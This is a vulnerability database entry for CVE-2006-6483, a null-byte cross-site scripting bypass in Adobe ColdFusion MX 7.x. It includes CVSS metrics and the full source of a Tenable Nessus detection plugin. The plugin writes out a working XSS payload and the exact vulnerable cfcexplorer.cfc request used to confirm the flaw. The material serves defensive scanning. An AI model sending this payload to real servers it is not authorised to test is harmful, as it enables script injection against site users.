Vulnerabilities > CVE-2006-6483 - Cross-Site Scripting vulnerability in ColdFusion MX

047910
CVSS 2.6 - LOW
Attack vector
NETWORK
Attack complexity
HIGH
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
high complexity
adobe
nessus

Summary

Adobe ColdFusion MX 7.x before 7.0.2 does not properly filter HTML tags when protecting against cross-site scripting (XSS) attacks, which allows remote attackers to inject arbitrary web script or HTML via a NULL byte (%00) in certain HTML tags, as demonstrated using "%00script" in a tag. Successful exploitation requires that the target uses Microsoft Internet Explorer.

Vulnerable Configurations

Part Description Count
Application
Adobe
2

Nessus

NASL familyCGI abuses : XSS
NASL idCOLDFUSION_XSS_PROTECTION_BYPASS.NASL
descriptionThe version of Adobe ColdFusion running on the remote host is affected by a cross-site scripting vulnerability due to a failure to completely sanitize user-supplied input before using it to generate dynamic content. A remote, unauthenticated attacker can leverage this issue to inject arbitrary HTML or script code into a user
last seen2020-06-01
modified2020-06-02
plugin id24279
published2007-02-06
reporterThis script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/24279
titleColdFusion MX Null Byte Tag XSS Protection Bypass
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description)
{
  script_id(24279);
  script_version("1.24");
  script_cvs_date("Date: 2018/11/15 20:50:19");

  script_cve_id("CVE-2006-6483");
  script_bugtraq_id(21532);

  script_name(english:"ColdFusion MX Null Byte Tag XSS Protection Bypass");
  script_summary(english:"Checks for an XSS flaw in ColdFusion.");

 script_set_attribute(attribute:"synopsis", value:
"A web-based application running on the remote web server is affected
by a cross-site scripting vulnerability.");
 script_set_attribute(attribute:"description", value:
"The version of Adobe ColdFusion running on the remote host is affected
by a cross-site scripting vulnerability due to a failure to completely
sanitize user-supplied input before using it to generate dynamic
content. A remote, unauthenticated attacker can leverage this issue to
inject arbitrary HTML or script code into a user's browser to be
executed within the security context of the affected site.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2006/Dec/210");
  script_set_attribute(attribute:"see_also", value:"https://www.adobe.com/support/security/bulletins/apsb07-06.html");
  script_set_attribute(attribute:"solution", value:
"Update to ColdFusion MX 7.0.2 if necessary and apply the hotfix
referenced in the vendor advisory above.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/12/10");
  script_set_attribute(attribute:"patch_publication_date", value:"2007/03/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/02/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:adobe:coldfusion");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");

  script_dependencies("coldfusion_detect.nasl");
  script_require_ports("Services/www", 80, 8500);
  script_require_keys("installed_sw/ColdFusion");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("install_func.inc");

app = 'ColdFusion';
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

# Send a request to exploit the flaw.
xss = "<0script>alert('" +SCRIPT_NAME-".nasl"+"-"+unixtime()+"')</script>";
exss = urlencode(
  str:xss,
  unreserved : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!~*'()-]/=;<>"
);

url =
  '/CFIDE/componentutils/cfcexplorer.cfc?' +
  'method=getcfcinhtmtestl&' +
  'name=CFIDE.adminapi.administrator&' +
  'path=/cfide/adminapi/administrator.cfctest">'+ exss;

res = http_send_recv3(method:"GET", item:dir+url, port:port, exit_on_fail:TRUE);

# There's a problem if our exploit appears in 'faultactor' as-is.
if ('PATH=/cfide/adminapi/administrator.cfctest">'+xss >< res[2] &&
    'form name="loginform" action=' >< res[2] &&
    'method="POST' >< res[2])
{
  output = strstr(res[2], 'PATH=/cfide/adminapi/administrator.cfctest">');
  if (empty_or_null(output)) output = res[2];

  security_report_v4(
     port       : port,
     severity   : SECURITY_WARNING,
     generic    : TRUE,
     xss        : TRUE,  # XSS KB key
     request    : make_list(install_url + url),
     output     : chomp(output),
     rep_extra  : '\nNote that this attack is known to work against users of Internet\nExplorer.  Other browsers might not be affected.\n'
    );
  exit(0);
}
else
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);